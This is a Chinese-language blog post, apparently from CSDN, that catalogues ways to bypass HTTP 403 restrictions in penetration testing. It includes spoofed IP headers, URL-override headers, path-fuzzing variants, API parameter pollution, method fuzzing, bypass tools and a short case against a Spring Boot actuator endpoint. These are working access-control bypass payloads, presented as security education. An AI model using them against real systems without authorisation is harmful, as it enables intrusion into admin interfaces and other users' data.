渗透技巧之403绕过【总结】

最新推荐文章于 2024-07-16 22:57:28 发布
最新推荐文章于 2024-07-16 22:57:28 发布
阅读量7.4k 收藏 34
点赞数 16
分类专栏: 总结 文章标签: 系统安全 安全 web安全 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/134800138
版权

文章目录

渗透技巧之403绕过【总结】

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 背景

1.什么是网页403?

在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。

2.什么是403绕过?

绕过 403 Forbidden Error 表示客户端能够与服务器通信,但服务器不允许客户端访问所请求的内容。

3.造成403的成因

首先我们来看看造成403可能得原因有哪些?

 1. 你的IP被列入黑名单。 
 2. 以http方式访问需要ssl连接的网址。
 3. 你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。
 4. 你的网页脚本文件在当前目录下没有执行权限。
 5. 服务器繁忙,同一IP地址发送请求过多,遭到服务器智能屏蔽。
 6. 在不允许写/创建文件的目录中执行了创建/写文件操作。
 7. 网站域名解析到了空间,但空间未绑定此域名。
 8. 浏览器不支持SSL 128时访问SSL 128的连接。
 9. 连接的用户过多,可以过后再试。
 10.DNS解析错误,手动更改DNS服务器地址。

0x03 绕过方式

1.绕过IP限制

部门网站只允许特定的IP进行访问,应该会验证客户端的IP,如果不是规定的IP,则会返回403。

可以通过下面的方式绕过:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost

2.url覆盖绕过

用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。

可以这样绕过的原因:有很多的web应用,只对uri地址内容进行权限检查,这就导致uri路径正常访问之后,我又覆盖了新的地址,导致403 ByPass

请求包

GET / HTTP/1.1
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Host: www.abc.com
Host: 192.168.126.6

3.扩展名绕过(路径fuzz)

基于扩展名(路径),用于绕过403受限制的目录。

abc.com/admin => 403
abc.com/admin/ => 200
abc.com/admin// => 200
abc.com//admin// => 200
abc.com/admin/* => 200
abc.com/admin/*/ => 200
abc.com/admin/. => 200
abc.com/admin/./ => 200
abc.com/./admin/./ => 200
abc.com/admin/./. => 200
abc.com/admin/./. => 200
abc.com/admin? => 200
abc.com/admin?? => 200
abc.com/admin??? => 200
abc.com/admin…;/ => 200
abc.com/admin/…;/ => 200
abc.com/%2f/admin => 200
abc.com/%2e/admin => 200
abc.com/admin%20/ => 200
abc.com/admin%09/ => 200
abc.com/%20admin%20/ => 200

其他api绕过

/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON 参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)

4.更换协议版本

如果使用 HTTP/1.1,请尝试使用 1.0,或者测试看它是否支持 2.0。

5.HTTP 请求方法fuzz

尝试使用不同的请求方法来访问:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK。

6.修改Referer

网站限制了访问来源,如果访问来源不符合,则也会返回403。
绕过方式:设置referer为访问网站的host。

7.修改user-agent

有的应用为了区分爬虫或者正常请求,会验证user-agent,看是否浏览器发出的请求。

8.常用自动化工具

1.https://github.com/iamj0ker/bypass-403

在这里插入图片描述

用法:

./bypass-403.sh https://example.com admin
./bypass-403.sh website-here path-here

2.https://github.com/lobuhi/byp4xx

在这里插入图片描述

3.https://github.com/gotr00t0day/forbiddenpass
在这里插入图片描述

4.BurpSuite插件 403Bypasser:可以在burp扩展商店安装

在这里插入图片描述在这里插入图片描述其中的Query Payloads,Header Payloads都可以自行添加。

0x04 实战分析

今天我们将看一下我在今年早些时候进行的一项外部渗透测试之一。客户只提供我们一个系统的URL,由于有保密协议,我们将使用https://www.example.com来代替。

直接进入到主题,访问目标系统网页。访问链接https://www.example.com存在springboot actuator未授权访问泄漏 ,但是正常访问接口信息是403状态,进而我们可以尝试进行网页403 Forbidden Error的绕过。

我们进入网站返回了403 Forbidden,然后使用Burp Suite捕获请求,以便进行可能的绕过操作。(在此部分fuzz可以手动进行测试,就不一一示范了)
在这里插入图片描述使用刚才下载的BurpSuite插件 403Bypasser插件尝试绕过。

在这里插入图片描述在这里插入图片描述发现可以使用/#/进行绕过。

一些绕过403的姿势
weixin_45253622的博客
01-16 7499
端口利用 扫描主机端口,找其它开放web服务的端口;访问其端口。 修改HOST 把host值修改为子域名或者ip来绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
20个403 bypass技巧
soc的博客
02-26 669
Web渗透测试中,403 Forbidden状态码如同一位沉默的守卫,常常让安全人员陷入困境。这个状态码表明服务器已理解请求,但拒绝执行。本文将从底层协议原理出发,结合攻防对抗案例,系统梳理20种经过实战验证的绕过技巧,帮助安全从业者建立完整的403绕过知识体系。
另类过滤外国浏览者
成长之路
09-13 720
作为一些版权网站,不希望给非本国的人浏览,通常常见的做法是采用全网过滤器过滤访问者的IP,比如典型的youku就是在浏览视频前分析访问者的IP,如果是海外用户则提示所在地区无法播放,然后记录下来。 原创文章,欢迎转载,请保留出处。 有任何错误、疑问或者建议,欢迎指出。 我的邮箱:Maxwell_nc@163.com
记一次解决Django 403
八阿哥的博客
07-18 2721
想直接看解决方案,可翻页到最後面提交无法登陆,打开F12调试工具查看ajax返回信息:403 CSRF cookie not set. 网上给出的大体是3种解决方案 1. 禁用django的crfs中间件 这个方法一劳永逸,但是不太安全,而且我在本地(ubuntu+Python 2.7.12+django1.11.2)上面测试可用,但是在服务器上(Centos6.5+Python 2.6.6+
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出中给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
403绕过
m0_68636078的博客
07-16 3252
HTTP 403 Forbidden 是一种 HTTP 响应状态代码,表示服务器理解客户端的请求,但拒绝授权访问。权限不足:用户或客户端没有权限访问该资源。IP 黑名单:请求来自被阻止的 IP 地址。请求头部不匹配:例如,User-Agent 或 Referer 不符合服务器的要求。用途:最初用于邮件服务,表示邮件发送者的原始 IP 地址。示例用途:表示远程客户端的 IP 地址。示例用途:表示客户端的 IP 地址。示例用途:通过代理服务器或负载均衡器时,表示原始客户端的 IP 地址。示例用途。
403 Forbidden错误原因
沐雨金鳞
09-08 609
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
403页面绕过
qq_63980959的博客
02-29 3451
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
渗透测试 403绕过~~~满满的干货
qq_59919573的博客
01-31 744
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url中的路径,尝试绕过对更高级别的缓存和web服务器的限制。
BurpSuite_403Bypasser:Burpsuite扩展程序绕过403受限制的目录
03-11
403章 一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。 有效负载:$ 1:HOSTNAME $ 2:PATH $1/$2 $1/./$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" $1 -H "X-Rewrite-URL: /$2" $1/$2 -H "Referer: /$2" $1/$2 -H "X-Originating-IP: 127.0.0.1" $1/$2 -H "X-Forwarded-For: 127.0.0.1" $1/$2 -H "X-Re
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip.zip
09-18
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip 你需要做的就是从终端运行该工具,给出以下输入:尝试尝试的页面( http/https://website.com/page )被拒绝时得到的响应的内容长度你希望该工具通过 X-Forwarded-For 尝试的IP范围然后,该
BypassSuper:绕过403或401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 特征 在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
SQL注入绕过技巧总结
09-09
因此,开发人员应始终确保对用户输入进行充分验证和过滤,同时,安全研究人员和渗透测试人员需要了解这些绕过技巧,以便更好地识别和防范潜在的SQL注入攻击。在实际的安全测试中,结合实际环境和经验,不断探索新的...
网络安全CTF竞赛中SQL注入题型解析:常见攻击手法与绕过技巧总结
最新发布
04-20
主要包括无过滤带回显的手工注入、万能密码及其变种、过滤部分字符后的绕过方法、Union联合查询绕过、SQL异或注入以及SQL盲注等六类典型问题。每种类型都配有详细的攻击流程、实际案例和可能用到的工具(如Firefox、...
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 4102
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
网安知识系列:SSRF漏洞中绕过IP限制的几种方法总结
weixin_54626591的博客
04-21 592
SSRF漏洞中绕过IP限制的几种方法总结
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值